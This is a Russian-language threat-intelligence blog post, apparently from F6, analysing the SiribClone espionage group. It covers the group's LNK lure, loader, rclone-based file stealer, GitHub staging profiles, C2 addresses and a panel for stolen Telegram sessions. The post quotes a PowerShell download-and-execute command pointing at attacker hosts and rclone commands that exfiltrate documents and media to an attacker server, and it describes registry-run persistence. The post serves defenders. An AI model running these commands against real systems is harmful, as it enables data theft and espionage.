Привет! На связи — команда киберразведки (Threat Intelligence) компании F6. Мы выпустили Для просмотра ссылки Войди
Раскрыть инфраструктуру ранее неизвестных злоумышленников помог файл, который эксперты F6 Threat Intelligence обнаружили в феврале 2026 года. Специалисты F6 назвали группировку SiribClone — по метаданным одного из атакующих и используемому инструменту rclone (утилита командной строки с открытым исходным кодом для работы с облачными хранилищами). Несмотря на небольшое количество обнаруженных публичных сэмплов, мы установили, что атакующие активно тестировали свои разработки с декабря 2025 года, а самые ранние следы фишинговой активности злоумышленников датируются летом 2025 года.
Кроме того, в ходе исследования мы выяснили, что группировка распространяет вредоносные файлы для десктопных и мобильных устройств, используя в качестве приманок приложения для «безопасного обмена фотографиями» и другие сервисы, документы на военную тематику, а также активно применяют социальную инженерию для получения доступа к Telegram‑аккаунтам российских военнослужащих. Причём участники группировки под видом девушек, «желающих познакомиться», и волонтёров лично общаются с военными через Telegram и другие популярные платформы. Данная активность была зафиксирована в январе‑феврале 2026 года, однако по обнаруженным сетевым артефактам можно предположить, что SiribClone применяет фишинг через Telegram с лета 2025 года по настоящее время.
В мае 2026 года, спустя несколько месяцев «молчания» SiribClone, мы обнаружили новые файлы группировки, которые злоумышленники распространяли через сайт, мимикрирующий под тематику Дня Победы («Бессмертный полк»).
Итоги исследования инфраструктуры новой группировки, инструментов, которые используют злоумышленники, представляем в этом блоге.
После прочтения сжечь
Файл, с которого началось наше исследование, был загружен на платформу для анализа файлов. С Google‑диска загружался файл под названием «Решение по СВОДУ.zip» по ссылке hxxps://drive[.]google[.]com/file/d/1DjDui8hEf6GXTJeeETXCo1r3NBizj1WR/view?usp=drive_link.Рисунок 1 — Содержимое загруженного архива на Google‑диске
В архиве, защищенном паролем, находится файл «Решение по СВОДУ.docx.lnk». При открытии выполняется следующая команда, открывающая файл‑приманку с hxxp://185[.]17[.]3[.]215:11317/content/pt/SVODU.docx и запускающая файл Для просмотра ссылки Войди
Код:
/c powershell -c "$i=$env:TEMP+'\SVODU.docx';
iwr hxxp://185[.]17[.]3[.]215:11317/content/pt/SVODU.docx -o $i;
Start-Process $i;
irm hxxps://github[.]com/evon-ch/ob/raw/refs/heads/main/REA[.]md | iex"Рисунок 2 — Документ‑приманка на военную тематику
Также в самом ярлыке содержались следующие метаданные:
Код:
Working directory: C:\Users\s1r1b\Downloads
Machine identifier: zam040kСкачиваемый файл Для просмотра ссылки Войди
Код:
[byte[]]$d=@(<bytes>);
[System.Reflection.Assembly]::Load($d);
[vmngr]::Down()Загруженная.NET сборка выполняет роль загрузчика: во временную директорию пользователя загружает файл vmngr.dll с https://github[.]com/evon‑ch/ob/raw/refs/heads/main/vmngr.dll. Далее DLL загружается в процесс через LoadLibrary, выполняется ее функция Wrapper, и управление передается основной полезной нагрузке. В артефактах сборки был найден следующий путь: «C:\Users\s1r1b\source\repos\price+\vmngrr\obj\Release\vmngrr.pdb».
Рисунок 3 — Содержимое загрузчика
Загружаемая vmngr.dll предназначена для эксфильтрации интересующих злоумышленника файлов с использованием rclone. Ее PDB‑путь: «C:\Users\s1r1b\source\repos\price+\x64\Release\price++.pdb». Специалисты F6 назвали это ВПО SiribGrabber.
Для получения конфигурации DLL расшифровывает URL‑ссылку алгоритмом Base64 → AES CBC, в результате получая URL hxxps://evon‑ch.github[.]io/ob/conf.txt. Далее DLL выполняет запрос для получения конфигурации к данной URL, расшифровывает конфигурацию тем же алгоритмом и парсит по набору параметров.
Рисунок 4 — Зашифрованная конфигурация rclone в репозитории злоумышленника
Рисунок 5 — Расшифрованная конфигурация
Для загрузки rclone DLL сначала проверяет наличие rclone по пути%LocalAppData%\rc\{rclone_directory_name}, где {rclone_directory_name} должен совпадать с наименованием архива из URL, указанным в параметре «rz_zip_down». В случае если директория отсутствует, DLL скачивает архив с rclone и сохраняет по файловому пути%LocalAppData%\Для просмотра ссылки Войди
Параметр blacklist отвечает за проверку системы по machineGUID. Если значение совпадет со значениями из списка, сэмпл прекращает работу.
Перед подключением выполняет проверку доступности удаленного сервера из конфигурации командой ping.
Код:
ping -n 3 -w 2000 {ip}После проверки подключения с помощью ping к указанным серверам в конфигурации создается профиль подключения rclone.
Код:
rclone.exe config create 229 sftp host={ip} user={user} port={port} pass={pass} key_file= key_file_pass= pubkey_file= key_use_agent=false use_insecure_cipher=false disable_hashcheck=falseПараметры {ip}, {user}, {port}, {pass} передаются на ВПО в конфигурации в виде объектов массива «svrs». После успешной конфигурации подключения SiribGrabber выполняет сбор логических дисков. По очереди для каждого диска выполняется команда, цель которой — копирование файлов с заданным набором фильтров с логического диска зараженной системы на удаленное хранилище, подконтрольное злоумышленнику. Копирование происходит в директорию по файловому пути шаблона /rc/{computername}‑{machine_guid}/.
Пример команды:
Код:
rclone.exe copy --copy-links {drive_path} 229:/rc/{computername}--{machine_guid}/ --filter "+ /" --filter "- /$Recycle.Bin/**" --filter "- /System Volume Information/**" --filter "- /Windows/**" --filter "- /Program Files/**" --filter "- /Program Files (x86)/**" --filter "- /ProgramData/**" --filter "- /PerfLogs/**" --filter "- /Intel/**" --filter "- /AMD/**" --filter "- /NVIDIA/**" --filter "- /MSOCache/**" --filter "- /boot/**" --filter "+ *.pdf" --filter "+ *.doc*" --filter "+ *.odt" --filter "+ *.txt" --filter "+ *.csv" --filter "+ *.xls*" --filter "+ *.ppt*" --filter "+ *.jpg" --filter "+ *.jpeg" --filter "+ *.png" --filter "+ *.gif" --filter "+ *.webp" --filter "+ *.hei*" --filter "+ *.bmp" --filter "+ *.tif*" --filter "+ *.mp4" --filter "+ *.mkv" --filter "+ *.avi" --filter "+ *.mov" --filter "+ *.wm*" --filter "+ *.3gp" --filter "+ *.webm" --filter "+ *.aac" --filter "+ *.flv" --filter "+ *.mp3" --filter "+ *.zip" --filter "+ *.rar" --filter "+ *.7z" --filter "+ *.iso" --filter "+ *.exe" --filter "+ *.msi" --filter "+ *.apk" --filter "- *" --bwlimit 2M --transfers 2 --checkers 4 --buffer-size 16M --ignore-checksum --fast-list --size-only --ignore-existing --retries 100 --retries-sleep 5m --low-level-retries 50Также для каждого логического диска собранная итоговая команда будет записана в BAT‑файл по пути%LocalAppData%/rc/rc{drive}.bat. После чего будет создан одноименный PS1-файл по файловому пути%LocalAppData%/rc/rc{drive}.ps1. Данный файл будет закреплен в системе путем добавления ключа с именем, имеющим шаблон rc{drive}, в ветку реестра HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run.
Таким образом после исследования файла мы установили два адреса атакующих (185[.]186[.]244[.]57 и 185[.]17[.]3[.]215) и профиль evon‑ch в GitHub.
Исследование GitHub‑профилей
В профиле evon‑ch был найден один репозиторий, первые коммиты в который были сделаны 24 января 2025 года. Активность профиля evon‑ch была эпизодической, и большая часть коммитов по всей видимости предназначалась для тестирования и отладки.Рисунок 6 — Таймлайн активности атакующего в GitHub
Первые коммиты содержали эксперименты над полезной нагрузкой — в виде ps‑скрипта, набора байтов или исполняемого файла.
Рисунок 7 — Пример первых коммитов атакующего в GitHub
Рисунок 8 — Пример первых коммитов атакующего в GitHub
Мы также обнаружили разные версии конфигурации ВПО в коммитах evon‑ch. К примеру, начиная с апреля 2026 года атакующий добавил команду для кражи Telegram‑сессии (однако по умолчанию папка с данными Telegram находится в другой директории).
Рисунок 9 — Конфигурация одного из апрельских коммитов (расшифрованная)
Рисунок 10 — Расшифрованная ps‑команда из конфигурации
В другой конфигурации папка с данными Telegram была указана верно, а эксфильтрация производилась по заготовленному пути «229:/rc/$env:COMPUTERNAME‑a5bc6d29-d0a7-4746-b01d‑addbf5976d5e/Users/MARS/AppData/Roaming/Telegram Desktop/». Присутствие определенных GUID и имен пользователей в путях может означать, что тестирование конфигураций могло происходить в среде атакующего.
Рисунок 11 — Пример другой расшифрованной команды из конфигурации
В одном из ранних коммитов полезная нагрузка загружалась по ссылке hxxps://files[.]catbox[.]moe/4nnmhq.dll. Конфигурация для rclone в этом файле 4nnmhq.dll берется с hxxps://github[.]com/s1r1ban/pagesService[.]github[.]io/blob/main/config.txt. Указанные С2 для эксфильтрации: 208[.]92[.]227[.]183 и 185[.]186[.]244[.]57.
Вот так мы обнаружили второй GitHub‑профиль атакующих с тем же ником, который фигурировал в PDB‑путях DLL (s1r1b) и метаданных LNK, описанных выше. Данный профиль был активен с 24 декабря 2025 года по 6 февраля 2026 года.
Рисунок 12 — Профиль пользователя s1r1ban
В профиле s1r1b коммиты содержали еще более ранние конфигурации для тестирования. Интересно, что в данном репозитории конфигурация была зашифрована тем же ключом, что и в описанном сэмпле.
Рисунок 13 — Пример первых коммитов
Рисунок 14 — Пример первых коммитов
Рисунок 15 — Пример первых коммитов
Также в метаданных LNK из части «После прочтения сжечь» обнаружили ник zam040k. По нему удалось найти некоторые комментарии шестилетней давности на украинских форумах и старый GitHub‑аккаунт.
Исследование сетевой инфраструктуры
Благодаря исследованию первоначального файла и GitHub‑профилей удалось обнаружить, что атакующими в качестве С2 в конфигурациях ВПО использовались следующие адреса:- 185[.]17[.]3[.]215;
- 185[.]186[.]244[.]57;
- 208[.]92[.]227[.]183.
- IP 185[.]17[.]3[.]215 и 185[.]139[.]69[.]136 были связаны общим SSH‑отпечатком.
Рисунок 16 — Общий SSH‑отпечаток - Также следующие IP были связаны одним ETag: 185[.]17[.]3[.]215, 185[.]139[.]69[.]136, 208[.]92[.]227[.]183, 185[.]186[.]244[.]57, 104[.]128[.]140[.]74.
Рисунок 17 — Общий ETag
Рисунок 18 — Информация о веб‑страницах
На указанных адресах была расположена страница входа в менеджер похищенных Telegram‑сессий. Изначально приложение не имело названия и было размещено на адресе 185[.]186[.]244[.]57, а затем «переехало» на новый адрес 185[.]17[.]3[.]215 уже с названием «КОНТУР». «КОНТУР» — внутреннее приложение атакующих, которое они используют для просмотра сообщений скомпрометированных аккаунтов. Про сам способ получения доступа к аккаунтам можно узнать в Для просмотра ссылки Войди
Рисунок 19 — Страница входа на страницу с IP 185[.]17[.]3[.]215
Изнутри приложение выглядит следующим образом: слева находится список скомпрометированных аккаунтов, справа — список каналов и чатов жертвы. Данные похищенных сессий хранятся в базе данных. Атакующие также добавили возможность «заметок» по жертвам: краткое описание личности, геолокации и должности, а также кем был «отработан» пользователь.
Исходя из анализа заметок злоумышленников можно сделать вывод, что цель их атак — военнослужащие ВС РФ, которые находятся на приграничных территориях и в зоне проведения СВО. Судя по описанию геолокаций атакованных пользователей, упоминаниям их званий и войсковых частей, задача атакующих — военный шпионаж.
На найденных IP‑адресах располагались несколько доменов. Они были предназначены для фишинговых страниц со входом через Telegram. Мы нашли несколько заготовок страниц на различные темы: «облачное хранилище», «присоединение к каналу», «видеоплеер TkTk» и другие.
Продолжение исследования, подробности, примеры фишинговых страниц для угона аккаунтов и распространения вредоносного ПО, индикаторы компрометации — в Для просмотра ссылки Войди
источник:Для просмотра ссылки Войди